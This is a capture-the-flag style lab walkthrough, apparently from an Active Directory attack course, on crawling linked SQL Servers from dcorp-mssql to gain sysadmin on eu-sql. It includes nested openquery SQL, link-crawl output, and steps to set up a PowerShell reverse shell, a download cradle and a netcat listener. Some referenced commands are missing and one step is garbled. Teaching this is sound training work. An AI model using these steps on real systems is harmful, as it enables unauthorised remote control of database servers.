1 - Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql
Flag 37 [dcorp-mssql] - First SQL Server linked to dcorp-mssql 🚩
Flag 38 [dcorp-mssql] - Name of SQL Server user used to establish link between dcorp-sql1 and dcorp-mgmt 🚩
Flag 39 [dcorp-mssql] - SQL Server privileges on eu-sql 🚩
Flag 40 [dcorp-mssql] - Privileges on operating system of eu-sql 🚩
Solutions
1 - Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql
Let's start with enumerating SQL servers in the domain and if studentx has privileges to connect to any of them. We can use PowerUpSQL module for that. Run the below command from a PowerShell session started using Invisi-Shell:
So, we can connect to dcorp-mssql. Using HeidiSQL client, let's login to dcorp-mssql using windows authentication of studentx. After login, enumerate linked databases on dcorp-mssql:
So, there is a database link to dcorp-sql1 from dcorp-mssql. Let's enumerate further links from dcorpsql1. This can be done with the help of openquery:
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student867
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL45.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL45
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User : sa
Links :
We can also use Get-SQLServerLinkCrawl for crawling the database links automatically:
select * from openquery("DCORP-SQL1",'select * from openquery("DCORP-MGMT",''select * from master..sysservers'')')
Sweet! We have sysadmin on eu-sql server!
If xp_cmdshell is enabled (or RPC out is true - which is set to false in this case), it is possible to execute commands on eu-sql using linked databases. To avoid dealing with a large number of quotes and escapes, we can use the following command:
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student867
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL45.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL45
CustomQuery : {USERNAME=SYSTEM, }
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL45.EU.EUROCORP.LOCAL}
User : sa
Links :
Create Invoke-PowerShellTcpEx.ps1:
Create a copy of Invoke-PowerShellTcp.ps1 and rename it to Invoke-PowerShellTcpEx.ps1.
Open Invoke-PowerShellTcpEx.ps1 in PowerShell ISE (Right click on it and click Edit).
Add "Power -Reverse -IPAddress 172.16.100.X -Port 443" (without quotes) to the end of the file.
Let's try to execute a PowerShell download execute cradle to execute a PowerShell reverse shell on the eu-sql instance, first to it, add sw on HFS and remember to edit Invoke-PowerShellTcpEx changing IP and Port
After that start a listener in a new shell: C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443